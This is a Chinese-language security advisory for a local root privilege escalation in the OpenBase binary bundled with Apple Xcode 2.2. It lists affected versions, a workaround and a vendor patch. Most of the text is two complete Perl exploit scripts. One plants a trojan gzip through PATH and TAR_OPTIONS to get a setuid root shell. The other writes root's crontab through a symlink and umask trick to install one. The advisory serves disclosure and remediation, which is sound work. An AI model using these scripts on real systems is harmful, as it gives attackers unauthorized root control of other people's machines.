发布日期：2006-10-16
更新日期：2006-10-18

受影响系统：

Apple XCode 2.2
OpenBase OpenBase 9.1.5_MacOSX
OpenBase OpenBase 8.0.4_MacOSX
OpenBase OpenBase 7.0.15_MacOSX
OpenBase OpenBase 10.0_MacOSX

不受影响系统：

Apple XCode 2.3

描述：

---

BUGTRAQ  ID: 20562

Xcode是苹果机器上所使用的开发工具。

Xcode在以高权限调用外部工具时存在漏洞，本地攻击者可能利用此漏洞提升自己的权限。

Xcode需要使用OpenBase技术为WebObjects组件提供额外的功能。OpenBase库在调用/Library/OpenBase/bin/gnutar时没有正确地使用setuid权限，在以euid=0运行OpenBase时调用了gnutar。通过使用TAR_OPTIONS环境变量就可以强制gnutar没有指定路径便调用gzip，因此攻击者可以通过控制PATH变量获得root权限。

<*来源：Kevin Finisterre （dotslash@snosoft.com）
  
  链接：http://secunia.com/advisories/22390/
        http://secunia.com/advisories/22474/
        http://marc.theaimsgroup.com/?l=full-disclosure&m=116105915801623&q=p3
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# http://docs.info.apple.com/article.html?artnum=61798 (This won't help)
# ftp://www.openbase.com/pub/OpenBase_10.0 (This will)
#
# This is an exploit for a 3rd party program that has been bundled with Xcode on several occasions.
# The OpenBase binary calls gnutar while running with euid=0 by passing TAR_OPTIONS we can cause gzip to be
# invoked. Since no path is specified we can export PATH=/path/to/trojan:$PATH in order to take root.

$binpath = "/Library/OpenBase/bin/OpenBase"; # Typical location.

# In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing.
$tgts{"0"} = "xcode_2-1.2_8m654_018213974.dmg:$binpath ";
$tgts{"1"} = "OpenBase9.1.5_MacOSX.dmg:$binpath ";
$tgts{"2"} = "OpenBase8.0.4_MacOSX.dmg:$binpath ";
$tgts{"3"} = "OpenBase7.0.15_MacOSX.dmg:$binpath ";

unless (($target) = @ARGV) {
        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

open(OP,">/tmp/proactive.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";
system("gcc -o /tmp/shX /tmp/proactive.c");

open(OP,">/tmp/or_really_reactive.c");
printf OP "main()\n";
printf OP "{ system(\"chown root: /tmp/shX; chmod 4755 /tmp/shX; rm -rf /tmp/or_really_reactive.c /tmp/proactive.c /tmp/pwndertino.* /tmp/gzip\"); }\n";
system("gcc -o /tmp/gzip /tmp/or_really_reactive.c");

system("mkdir /tmp/pwndertino.db");
system("echo \"Way to proactively audit 3rd party binaries before cramming them into a release \"> /tmp/pwndertino.db/port");
system("echo \"I wonder how long these vulnerable suids have been bundled with xcode \"> /tmp/pwndertino.db/encoding");
system("echo \"All your Mac are belong to us \"> /tmp/pwndertino.db/threads");
system("echo \"Welcome to pwndertino \"> /tmp/pwndertino.db/notification");
system("echo \"For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available \"> /tmp/pwndertino.db/simulationMode");
system("echo \"To learn more about Apple Product Security, see the Apple Computer Product Security Incident Response website\" > /tmp/pwndertino.db/safe_sql_mode");

system("export TAR_OPTIONS=\"-zv /etc/master.passwd\"; export PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin;$b ../../../../../../tmp/pwndertino");

system("/tmp/shX");

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# http://docs.info.apple.com/article.html?artnum=61798 (This won't help)
# ftp://www.openbase.com/pub/OpenBase_10.0 (This will)
#
# Create a new file anywhere on the filesystem with rw-rw-rw privs.
# Sorry you can NOT overwrite existing files.
#
# Writing to roots crontab seems to be fairly prompt at handing out root shells
# Make sure that you get cron running by first creating a user crontab!
#
# This is an exploit for a 3rd party program that has been bundled with Xcode on several
# occasions. The OpenBase binary creates a root owned log file 'simulation.sql' in the database path.
# Since we control the database path via directory transversal and we also control the umask we can
# create a file anywhere on the filesystem that is rw-rw-rw and owned by root.
#  
# Following symlinks is bad mmmmmmmmmmkay!

$dest = "/var/cron/tabs/root";

$binpath = "/Library/OpenBase/bin/OpenBase"; # Typical location.

# In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing.
$tgts{"0"} = "xcode_2-1.2_8m654_018213974.dmg:$binpath ";
$tgts{"1"} = "OpenBase9.1.5_MacOSX.dmg:$binpath ";
$tgts{"2"} = "OpenBase8.0.4_MacOSX.dmg:$binpath ";
$tgts{"3"} = "OpenBase7.0.15_MacOSX.dmg:$binpath ";

unless (($target) = @ARGV) {
        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

open(OP,">/tmp/proactive.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";
system("gcc -o /Users/Shared/shX /tmp/proactive.c");

# Create a user crontab FIRST! This ensures that cron is running when the fake root crontab is created. Aka semi-insta-root (in a minute)
system("echo '* * * * * /usr/bin/id > /tmp/aa' > /tmp/user_cron");
system("crontab /tmp/user_cron");

system("mkdir /tmp/pwndertino.db");
system("echo \"Way to proactively audit 3rd party binaries before cramming them into a release \"> /tmp/pwndertino.db/port");
system("echo \"I wonder how long these vulnerable suids have been bundled with xcode \"> /tmp/pwndertino.db/encoding");
system("echo \"All your Mac are belong to us \"> /tmp/pwndertino.db/threads");
system("echo \"Welcome to pwndertino \"> /tmp/pwndertino.db/notification");
system("echo \"For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available \"> /tmp/pwndertino.db/simulationMode");
system("echo \"To learn more about Apple Product Security, see the Apple Computer Product Security Incident Response website\" > /tmp/pwndertino.db/safe_sql_mode");

# The umask is where the lovin occurs. I'm rw-rw-rw James bitch!!
system("rm -rf  /tmp/pwndertino.sim; mkdir /tmp/pwndertino.sim; ln -s $dest /tmp/pwndertino.sim/simulation.sql");
system("umask 111; export TAR_OPTIONS=\"-v \"; export PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin;$b ../../../../../../tmp/pwndertino");
print "$dest should be rw-rw-rw ... enjoy!\n";
print "installing trojan crontab for root\n";

system("echo '* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX' > /var/cron/tabs/root");

print "sit around and chill for a minute then check /Users/Shared/shX !\n";
sleep 60 ;

system("/Users/Shared/shX");

建议：

---

临时解决方法：

* 从OpenBase删除setuid标记。

厂商补丁：

OpenBase
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

ftp://www.openbase.com/pub/OpenBase_10.0

浏览次数：3393
严重程度：0（网友投票）